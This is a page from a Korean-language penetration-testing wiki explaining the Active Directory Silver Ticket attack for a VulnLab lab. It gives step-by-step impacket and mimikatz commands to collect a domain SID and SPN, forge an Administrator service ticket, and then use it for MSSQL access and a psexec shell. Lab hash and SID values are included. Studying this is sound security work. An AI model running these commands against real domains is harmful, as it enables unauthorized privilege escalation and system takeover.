펜테스팅 위키
  • Welcome
    • Home
  • 정보 수집
    • OSINT
      • Sub Domain
      • Google Hacking
      • Github
      • IP Address
      • Employees
    • 내부망
      • RID Cycling
      • Password Spraying
      • Password Must Change
      • Extension
        • xlsx/ods
        • pfx
        • vhd
        • pst
        • vbs
        • hc
      • Protocol
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 23 - Telnet
        • 53 - DNS
        • 80/443 - HTTP
        • 88 - Kerberos
        • 111 - RPC
        • 135 - msrpc
        • 139/445 - SMB
        • 389/636 - LDAP
        • 1433 - MSSQL
        • 5985/5986 - wsman
  • 초기 침투
    • CVEs
      • CVE-2025-31486
    • Phishing
      • Command File
      • EXE + LNK
      • wax
      • Microsoft Word
    • Web
      • Quary Language
        • SQL
        • GraphQL
      • File Upload
      • File Download
      • XSS
      • SSRF
      • CSRF
      • Open Redirect
      • SOP / CORS
    • ZIP Slip
  • 지속성
    • Active Directory
      • Golden Ticket
      • DC Shadow
      • RID Hijacking
    • Local
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM
      • WMI Event Subscription
      • SSH Key Injection
      • DLL Hijacking
      • DLL SideLoading
      • Create Account
  • 권한 상승
    • Active Directory
      • DACL
        • ReadGMSAPassword
        • ReadLAPSPassword
        • ForceChangePassword
        • AddSelf
        • WriteOwner
        • GenericAll
        • GenericWrite
        • WriteSPN
        • AddMembers
        • WriteProperty
        • WriteGPO
        • AddAllowedToAct
        • AllExtendedRights
      • AD CS
        • Abuse Permissions
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC5
        • ESC6
        • ESC7
        • ESC8
        • ESC9
        • ESC10
        • ESC11
        • CVE-2022-26923
        • Non-PKINIT
      • MS14-068
      • Server Operators
      • DnsAdmins
      • noPac
      • Silver Ticket
      • KrbRelayUp
    • Windows
      • SeImpersonatePrivilege
      • Unquoted Service Path
      • Weak Service Permissions
      • Weak Service Binary Permissions
      • UAC Bypass
      • Always Install Elevated
      • Autoruns
      • Credential Manager
      • Local Service Account
  • 민감정보 탈취
    • Active Directory
      • DCSync
      • LSASS
      • AS-REP-Roasting
      • AS Requested Service Tickets
      • Kerberoasting
      • Targeted Kerberoast
      • Shadow Credentials
      • Backup Operators
      • SeEnableDelegationPrivilege
    • Windows
      • Unattended File
      • Browser Stored Credentials
      • NTLM Relay
      • Hard-coding Credentials
      • SeBackupPrivilege
  • 측면 이동
    • File Transfer
      • SCP
      • ZIP
      • ncat
      • Python
      • PowerShell
      • certutil
      • wget
      • SMB
      • Base64
      • FTP
      • WebDav
      • cURL
    • Port Forwarding
    • SMB/Windows Admin Shares
    • RDP
    • DCOM
    • WinRM
    • Domain Trust Discovery
  • ETC
    • CS
      • Kerberos
      • NTLM
      • PKINIT
      • Integrity
      • Registry
      • Active Directory Trusts
      • Delegation
      • OAuth 2.0
      • S4U
    • Tools
      • Cobalt Strike
      • BloodHound
      • Certipy-ad
      • LDAP Search
      • Hydra
Powered by GitBook
On this page
  • Abuse
  • References

Was this helpful?

Export as PDF
  1. 권한 상승
  2. Active Directory

Silver Ticket

PreviousnoPacNextKrbRelayUp

Last updated 4 months ago

Was this helpful?

Silver Ticket은 Kerberoasting 공격에서 비롯된 공격 중 하나로

도메인 전체에 대한 관리자 권한을 지속하는 Golden Ticket과는 다른 성격을 가집니다.

분류
목적
범위

도메인 관리자 권한 지속성

도메인

Silver Ticket

관리자 권한의 서비스 이용

서비스

표에서 볼 수 있듯이 실버 티켓 공격은 이미 도메인에 대해서 관리자 권한을 획득한 후에

권한을 지속시키려는 지속성 공격이 아닌,

낮은 권한의 계정으로부터 서비스 이용 시 높은 권한을 이용하려는 목적인 권한 상승입니다.

실버 티켓을 통한 권한 상승 방법은 다음과 같이 진행됩니다.

  1. 서비스 NT Hash 획득

  2. 서비스NT Hash를 이용하여 PAC 정보에 저장된 권한 정보 상승

  3. 변조된 서비스 티켓을 서비스 서버에 제출함에 따라 높은 권한으로 서비스 이용

이 공격을 이해하기 위한 자세한 기술적 설명은 Kerberos에서 상세히 다룹니다.

실버 티켓을 생성하기 위해선 몇가지 사전 정보가 필요합니다.

  • 도메인 SID

  • 서비스 계정 NT Hash

  • SPN

Abuse

실버 티켓에 필요한 준비물 3가지는 다음과 같이 준비합니다.

# 도메인 SID 획득
impacket-lookupsids <Domain>/<USER>:<PASS>@<IP>

# 사용자 NT Hash
# https://codebeautify.org/ntlm-hash-generator

# SPN
impacket-GetUserSPNs <Domain>/<USER>:<PASS> -request

실습 환경에서 획득한 정보는 다음과 같습니다.

  • 도메인 SID : S-1-5-21-2330692793-3312915120-706255856

  • 사용자NT Hash : 69596C7AA1E8DAEE17F8E78870E25A5C

  • SPN : MSSQLSvc/breachdc.breach.vl:1433

# 실버 티켓 생성
impacket-ticketer -nthash <NT Hash> -domain-sid <SID> -domain <Domain> -spn <SPN> -user-id 500 Administrator

# 티켓 환경변수 등록
export KRB5CCNAME=Administrator.ccache

# 서비스 이용
impacket-mssqlclient -k -no-pass <Domain> -windows-auth

# 쉘 획득
impacket-psexec -k -no-pass <Domain>
# 실버 티켓 생성
kerberos::golden /domain:<DOMAIN> /sid:<SID> /rc4:<HASH> /user:<USER> /target:<TARGET> /service:<Service>

# Pass The Ticket
kerberos::ptt <TICKET_FILE>

References

Golden Ticket
LogoBreach: VulnLabMedium
LogoWhat is a Silver Ticket Attack? – CrowdStrikeCrowdStrike.com
LogoSilver & Golden Ticketshackndo
LogoSilver TicketHackTricks
https://en.hackndo.com/kerberos-silver-golden-tickets/#silver-ticket